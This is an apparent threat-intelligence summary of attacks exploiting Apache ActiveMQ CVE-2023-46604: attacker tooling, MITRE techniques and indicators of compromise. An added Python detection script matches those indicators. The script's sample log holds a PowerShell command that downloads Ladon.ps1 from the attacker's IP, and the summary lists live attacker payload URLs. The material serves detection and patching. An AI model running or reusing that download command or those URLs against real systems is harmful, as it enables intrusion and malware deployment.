Apache ActiveMQ Vulnerability (CVE-2023-46604) Continuously Being Exploited in Attacks – ASEC BLOG

Attacks against unpatched Apache ActiveMQ (CVE-2023-46604) continue, with operations attributed to groups like Andariel deploying Ladon, NetCat, AnyDesk, and z0Miner to gain control and execute malware. The report outlines the attack chain—from vulnerability exploitation to remote access, credential theft, and cryptocurrency mining—and recommends patching vulnerable versions and tightening server defenses. #CVE-2023-46604 #Ladon #AnyDesk #z0Miner #Andariel #ApacheActiveMQ

Keypoints

  • CVE-2023-46604 is actively exploited to execute commands on exposed Apache ActiveMQ servers.
  • Early attacks involved Andariel, HelloKitty ransomware, Cobalt Strike, and Metasploit Meterpreter; Ladon, NetCat, AnyDesk, and z0Miner appear in newer campaigns.
  • Ladon is used for scanning, privilege escalation, credential theft, and establishing reverse shells.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Attacker can execute malicious commands from a remote location and take over the target system. Quote: “CVE-2023-46604 is a remote code execution vulnerability in the open-source messaging and integration pattern server Apache ActiveMQ. If an unpatched Apache ActiveMQ is externally exposed, the threat actor can execute malicious commands from a remote location and take over the target system.”
  • [T1046] Network Service Scanning – Ladon offers scanning for the relatively recent CVE-2023-46604 vulnerability. Quote: “Ladon offers scanning for the relatively recent CVE-2023-46604 vulnerability.”
  • [T1059.001] PowerShell – Used to download Ladon and execute a reverse shell via a PowerShell command loaded from an XML config. Quote: “a command is configured to use CMD and PowerShell to download Ladon before executing a reverse shell command.”
  • [T1059.003] Windows Command Shell – Used in the same command sequence to download Ladon and trigger a reverse shell. Quote: “a command is configured to use CMD and PowerShell to download Ladon before executing a reverse shell command.”
  • [T1105] Ingress Tool Transfer – Tools and payloads are downloaded from external URLs (e.g., Ladon.ps1, poc2.xml). Quote: “Download: hxxp://27.191.193[.]193:555/Ladon.ps1 : Ladon”
  • [T1021.001] Remote Services – Remote administration tools like AnyDesk are used to control compromised systems. Quote: “remote administration tools such as AnyDesk, NetSupport, and Chrome Remote Desktop have recently been used for bypassing security products.”
  • [T1496] Resource Hijacking – Coin miners (XMRig) are installed post-compromise. Quote: “Recently, there were also attack campaigns where XMRig CoinMiner was installed.”
  • [T1003] Credential Access – Ladon features include credential theft as part of its capabilities. Quote: “Major features include scanning, privilege escalation, account credential theft, and reverse shell.”

Indicators of Compromise

  • [IP] C2 addresses – 27.191.193[.]193:50000, 62.233.50[.]97:6666
  • [MD5] eb0e70ea44e578201df1e3c49e905144, 1a7e8e719e29c2cca5083053bb240dbc
  • [MD5] b6e0db27c2b3e62db616b0918a5d8ed8, c1aa596dc33f2ba4aadbd689a1652701
  • [MD5] baeee25ebf0efeec414dce64b9e7aca7, 2a0d26b8b02bb2d17994d2a9a38d61db
  • [URL] hxxp://27.191.193[.]193:555/Ladon.ps1, hxxp://27.191.193[.]193:555/poc2.xml
  • [File] Ladon.ps1, poc2.xml
  • Additional IOCs include other configurations and mining-related files such as paste.xml, paste.ps1, s.rar, and config.json mentioned in the article.
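As an added example (editor's code, not from the ASEC article), the following script turns the indicators and the CMD/PowerShell download-and-execute behaviour described above into simple checks: it tags constructed process-creation log lines by IoC match and by download-cradle pattern, and it classifies an ActiveMQ version string against the fixed releases (5.15.16, 5.16.7, 5.17.6, 5.18.3) from the Apache advisory. The download-cradle keyword list and the sample log lines are assumptions for illustration.

```python
import re

# Indicators copied from the summary above (defanged form is accepted; refang()
# converts hxxp and [.] so they match real logs).
C2_IOCS = {
    "27.191.193.193:50000", "62.233.50.97:6666",
    "27.191.193.193:555/Ladon.ps1", "27.191.193.193:555/poc2.xml",
}
IOC_FILES = {"ladon.ps1", "poc2.xml", "paste.xml", "paste.ps1", "s.rar"}

# Behavioural pattern from the report: PowerShell fetching a remote .ps1/.xml.
# The cradle keywords are an assumed, non-exhaustive list.
CRADLE = re.compile(
    r"powershell.*?\b(DownloadString|DownloadFile|Invoke-WebRequest|iwr|iex)\b"
    r".*?https?://\S+\.(ps1|xml)", re.I)

def refang(text):
    return text.replace("hxxp", "http").replace("[.]", ".")

def classify(line):
    """Return detection tags for one process-creation log line."""
    line = refang(line)
    tags = []
    if any(ioc in line for ioc in C2_IOCS):
        tags.append("ioc:c2")
    if any(name in line.lower() for name in IOC_FILES):
        tags.append("ioc:file")
    if CRADLE.search(line):
        tags.append("behavior:ps-download-cradle")
    return tags

# First fixed release per maintained 5.x line (Apache advisory for CVE-2023-46604).
FIXED = {(5, 15): 16, (5, 16): 7, (5, 17): 6, (5, 18): 3}

def activemq_vulnerable(version):
    """True when the given ActiveMQ version predates the fix for CVE-2023-46604."""
    major, minor, patch = map(int, re.match(r"(\d+)\.(\d+)\.(\d+)", version).groups())
    if major >= 6:
        return False
    if (major, minor) < (5, 15):
        return True  # every 5.x line before 5.15 is older than 5.15.16
    return patch < FIXED[(major, minor)]

# Constructed sample lines; the first mimics the reported download step.
SAMPLE_LOGS = [
    'cmd.exe /c powershell -c "Invoke-WebRequest http://27.191.193.193:555/Ladon.ps1 -OutFile C:\\Windows\\Temp\\Ladon.ps1"',
    "svchost.exe -k netsvcs",
]

if __name__ == "__main__":
    for entry in SAMPLE_LOGS:
        print(classify(entry), entry)
    print(activemq_vulnerable("5.18.2"), activemq_vulnerable("5.18.3"))
```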

Read more: https://asec.ahnlab.com/en/59904/